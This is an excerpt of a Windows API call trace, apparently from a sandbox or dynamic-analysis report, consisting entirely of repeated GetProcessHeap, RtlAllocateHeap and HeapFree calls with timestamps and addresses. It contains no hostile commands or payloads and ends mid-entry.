GetProcessHeap () returned 0xe30000 [0113.196] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0113.196] GetProcessHeap () returned 0xe30000 [0113.196] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0113.196] GetProcessHeap () returned 0xe30000 [0113.196] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0113.204] GetProcessHeap () returned 0xe30000 [0113.204] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0113.204] GetProcessHeap () returned 0xe30000 [0113.204] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0113.204] GetProcessHeap () returned 0xe30000 [0113.204] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0113.204] GetProcessHeap () returned 0xe30000 [0113.204] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0113.204] GetProcessHeap () returned 0xe30000 [0113.204] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0113.205] GetProcessHeap () returned 0xe30000 [0113.208] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0113.208] GetProcessHeap () returned 0xe30000 [0113.208] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0113.208] GetProcessHeap () returned 0xe30000 [0113.208] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0113.208] GetProcessHeap () returned 0xe30000 [0113.208] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0113.208] GetProcessHeap () returned 0xe30000 [0113.208] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0113.208] GetProcessHeap () returned 0xe30000 [0113.208] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0113.211] GetProcessHeap () returned 0xe30000 [0113.211] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0113.215] GetProcessHeap () returned 0xe30000 [0113.215] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0113.215] GetProcessHeap () returned 0xe30000 [0113.215] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0113.215] GetProcessHeap () returned 0xe30000 [0113.215] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0113.215] GetProcessHeap () returned 0xe30000 [0113.215] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0113.215] GetProcessHeap () returned 0xe30000 [0113.215] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0113.221] GetProcessHeap () returned 0xe30000 [0113.221] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0113.221] GetProcessHeap () returned 0xe30000 [0113.221] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0113.221] GetProcessHeap () returned 0xe30000 [0113.221] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0113.221] GetProcessHeap () returned 0xe30000 [0113.221] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0113.221] GetProcessHeap () returned 0xe30000 [0113.221] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0113.221] GetProcessHeap () returned 0xe30000 [0113.221] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0113.221] GetProcessHeap () returned 0xe30000 [0113.221] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0113.221] GetProcessHeap () returned 0xe30000 [0113.221] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0113.221] GetProcessHeap () returned 0xe30000 [0113.221] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0113.221] GetProcessHeap () returned 0xe30000 [0113.222] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0113.222] GetProcessHeap () returned 0xe30000 [0113.222] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0113.222] GetProcessHeap () returned 0xe30000 [0113.222] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0113.222] GetProcessHeap () returned 0xe30000 [0113.222] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0113.222] GetProcessHeap () returned 0xe30000 [0113.222] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0113.222] GetProcessHeap () returned 0xe30000 [0113.229] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0113.229] GetProcessHeap () returned 0xe30000 [0113.229] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0113.229] GetProcessHeap () returned 0xe30000 [0113.230] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0113.230] GetProcessHeap () returned 0xe30000 [0113.230] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0113.240] GetProcessHeap () returned 0xe30000 [0113.240] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0113.240] GetProcessHeap () returned 0xe30000 [0113.240] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0113.240] GetProcessHeap () returned 0xe30000 [0113.241] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0113.245] GetProcessHeap () returned 0xe30000 [0113.245] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0113.245] GetProcessHeap () returned 0xe30000 [0113.245] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0113.245] GetProcessHeap () returned 0xe30000 [0113.245] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0113.249] GetProcessHeap () returned 0xe30000 [0113.249] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0113.249] GetProcessHeap () returned 0xe30000 [0113.249] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0113.255] GetProcessHeap () returned 0xe30000 [0113.255] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0113.255] GetProcessHeap () returned 0xe30000 [0113.255] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0113.255] GetProcessHeap () returned 0xe30000 [0113.268] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0113.268] GetProcessHeap () returned 0xe30000 [0113.268] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0113.268] GetProcessHeap () returned 0xe30000 [0113.476] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0113.476] GetProcessHeap () returned 0xe30000 [0113.480] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0113.480] GetProcessHeap () returned 0xe30000 [0113.480] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0113.480] GetProcessHeap () returned 0xe30000 [0113.480] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0113.480] GetProcessHeap () returned 0xe30000 [0113.480] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0113.492] GetProcessHeap () returned 0xe30000 [0113.493] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0113.493] GetProcessHeap () returned 0xe30000 [0113.493] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0113.493] GetProcessHeap () returned 0xe30000 [0113.493] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0113.493] GetProcessHeap () returned 0xe30000 [0113.493] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0113.493] GetProcessHeap () returned 0xe30000 [0113.493] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0113.493] GetProcessHeap () returned 0xe30000 [0113.493] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0113.493] GetProcessHeap () returned 0xe30000 [0113.493] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0113.493] GetProcessHeap () returned 0xe30000 [0113.493] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0113.493] GetProcessHeap () returned 0xe30000 [0113.493] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0113.493] GetProcessHeap () returned 0xe30000 [0113.493] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0113.493] GetProcessHeap () returned 0xe30000 [0113.493] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0113.493] GetProcessHeap () returned 0xe30000 [0113.493] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0113.493] GetProcessHeap () returned 0xe30000 [0113.493] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0113.493] GetProcessHeap () returned 0xe30000 [0113.493] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0113.493] GetProcessHeap () returned 0xe30000 [0113.493] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0113.493] GetProcessHeap () returned 0xe30000 [0113.493] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0113.493] GetProcessHeap () returned 0xe30000 [0113.493] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0113.493] GetProcessHeap () returned 0xe30000 [0113.493] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0113.493] GetProcessHeap () returned 0xe30000 [0113.493] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0113.493] GetProcessHeap () returned 0xe30000 [0113.493] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0113.493] GetProcessHeap () returned 0xe30000 [0113.494] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0113.494] GetProcessHeap () returned 0xe30000 [0113.494] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0113.494] GetProcessHeap () returned 0xe30000 [0113.494] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0113.494] GetProcessHeap () returned 0xe30000 [0113.494] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0113.494] GetProcessHeap () returned 0xe30000 [0113.494] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0113.494] GetProcessHeap () returned 0xe30000 [0113.494] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0113.494] GetProcessHeap () returned 0xe30000 [0113.494] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0113.494] GetProcessHeap () returned 0xe30000 [0113.494] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0113.494] GetProcessHeap () returned 0xe30000 [0113.494] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0113.494] GetProcessHeap () returned 0xe30000 [0113.494] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0113.494] GetProcessHeap () returned 0xe30000 [0113.494] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0113.494] GetProcessHeap () returned 0xe30000 [0113.494] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0113.494] GetProcessHeap () returned 0xe30000 [0113.494] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0113.494] GetProcessHeap () returned 0xe30000 [0113.494] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0113.494] GetProcessHeap () returned 0xe30000 [0113.494] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0113.494] GetProcessHeap () returned 0xe30000 [0113.494] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0113.494] GetProcessHeap () returned 0xe30000 [0113.494] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0113.494] GetProcessHeap () returned 0xe30000 [0113.494] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0113.494] GetProcessHeap () returned 0xe30000 [0113.494] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0113.494] GetProcessHeap () returned 0xe30000 [0113.494] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0113.494] GetProcessHeap () returned 0xe30000 [0113.495] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0113.495] GetProcessHeap () returned 0xe30000 [0113.495] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0113.495] GetProcessHeap () returned 0xe30000 [0113.495] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0113.495] GetProcessHeap () returned 0xe30000 [0113.495] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0113.495] GetProcessHeap () returned 0xe30000 [0113.495] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0113.495] GetProcessHeap () returned 0xe30000 [0113.495] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0113.495] GetProcessHeap () returned 0xe30000 [0113.495] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0113.495] GetProcessHeap () returned 0xe30000 [0113.495] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0113.495] GetProcessHeap () returned 0xe30000 [0113.495] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0113.495] GetProcessHeap () returned 0xe30000 [0113.495] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0113.495] GetProcessHeap () returned 0xe30000 [0113.495] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0113.495] GetProcessHeap () returned 0xe30000 [0113.495] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0113.495] GetProcessHeap () returned 0xe30000 [0113.495] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0113.495] GetProcessHeap () returned 0xe30000 [0113.495] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0113.495] GetProcessHeap () returned 0xe30000 [0113.495] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0113.495] GetProcessHeap () returned 0xe30000 [0113.495] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0113.495] GetProcessHeap () returned 0xe30000 [0113.495] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0113.495] GetProcessHeap () returned 0xe30000 [0113.495] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0113.495] GetProcessHeap () returned 0xe30000 [0113.495] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0113.495] GetProcessHeap () returned 0xe30000 [0113.495] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0113.495] GetProcessHeap () returned 0xe30000 [0113.496] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0113.496] GetProcessHeap () returned 0xe30000 [0113.496] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0113.496] GetProcessHeap () returned 0xe30000 [0113.496] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0113.496] GetProcessHeap () returned 0xe30000 [0113.496] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0113.496] GetProcessHeap () returned 0xe30000 [0113.496] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0113.496] GetProcessHeap () returned 0xe30000 [0113.496] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0113.496] GetProcessHeap () returned 0xe30000 [0113.496] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0113.496] GetProcessHeap () returned 0xe30000 [0113.496] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0113.496] GetProcessHeap () returned 0xe30000 [0113.496] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0113.496] GetProcessHeap () returned 0xe30000 [0113.496] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0113.496] GetProcessHeap () returned 0xe30000 [0113.496] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0113.496] GetProcessHeap () returned 0xe30000 [0113.496] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0113.496] GetProcessHeap () returned 0xe30000 [0113.496] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0113.496] GetProcessHeap () returned 0xe30000 [0113.496] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0113.496] GetProcessHeap () returned 0xe30000 [0113.496] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0113.496] GetProcessHeap () returned 0xe30000 [0113.496] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0113.496] GetProcessHeap () returned 0xe30000 [0113.496] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0113.496] GetProcessHeap () returned 0xe30000 [0113.496] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0113.496] GetProcessHeap () returned 0xe30000 [0113.496] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0113.496] GetProcessHeap () returned 0xe30000 [0113.496] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0113.496] GetProcessHeap () returned 0xe30000 [0113.496] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0113.496] GetProcessHeap () returned 0xe30000 [0113.497] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0113.497] GetProcessHeap () returned 0xe30000 [0113.497] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0113.497] GetProcessHeap () returned 0xe30000 [0113.497] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0113.497] GetProcessHeap () returned 0xe30000 [0113.497] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0113.497] GetProcessHeap () returned 0xe30000 [0113.497] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0113.497] GetProcessHeap () returned 0xe30000 [0113.497] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0113.497] GetProcessHeap () returned 0xe30000 [0113.497] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0113.497] GetProcessHeap () returned 0xe30000 [0113.497] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0113.497] GetProcessHeap () returned 0xe30000 [0113.497] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825608 [0113.497] GetProcessHeap () returned 0xe30000 [0113.497] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825608 | out: hHeap=0xe30000) returned 1 [0113.497] GetProcessHeap () returned 0xe30000 [0113.497] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0113.497] GetProcessHeap () returned 0xe30000 [0113.497] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0113.497] GetProcessHeap () returned 0xe30000 [0113.497] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0113.497] GetProcessHeap () returned 0xe30000 [0113.497] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0113.497] GetProcessHeap () returned 0xe30000 [0113.497] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0113.497] GetProcessHeap () returned 0xe30000 [0113.497] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0113.497] GetProcessHeap () returned 0xe30000 [0113.497] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0113.497] GetProcessHeap () returned 0xe30000 [0113.497] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0113.497] GetProcessHeap () returned 0xe30000 [0113.497] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0113.497] GetProcessHeap () returned 0xe30000 [0113.497] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0113.497] GetProcessHeap () returned 0xe30000 [0113.497] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0113.497] GetProcessHeap () returned 0xe30000 [0113.498] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0113.498] GetProcessHeap () returned 0xe30000 [0113.498] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0113.498] GetProcessHeap () returned 0xe30000 [0113.498] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0113.498] GetProcessHeap () returned 0xe30000 [0113.498] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0113.498] GetProcessHeap () returned 0xe30000 [0113.498] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0113.498] GetProcessHeap () returned 0xe30000 [0113.498] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0113.498] GetProcessHeap () returned 0xe30000 [0113.498] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0113.498] GetProcessHeap () returned 0xe30000 [0113.498] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0113.498] GetProcessHeap () returned 0xe30000 [0113.498] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0113.498] GetProcessHeap () returned 0xe30000 [0113.498] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0113.498] GetProcessHeap () returned 0xe30000 [0113.498] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0113.498] GetProcessHeap () returned 0xe30000 [0113.498] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0113.498] GetProcessHeap () returned 0xe30000 [0113.498] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0113.498] GetProcessHeap () returned 0xe30000 [0113.498] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0113.498] GetProcessHeap () returned 0xe30000 [0113.498] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0113.498] GetProcessHeap () returned 0xe30000 [0113.498] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0113.498] GetProcessHeap () returned 0xe30000 [0113.498] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0113.498] GetProcessHeap () returned 0xe30000 [0113.498] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0113.498] GetProcessHeap () returned 0xe30000 [0113.498] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0113.498] GetProcessHeap () returned 0xe30000 [0113.498] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0113.498] GetProcessHeap () returned 0xe30000 [0113.499] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0113.499] GetProcessHeap () returned 0xe30000 [0113.499] RtlAllocateHeap 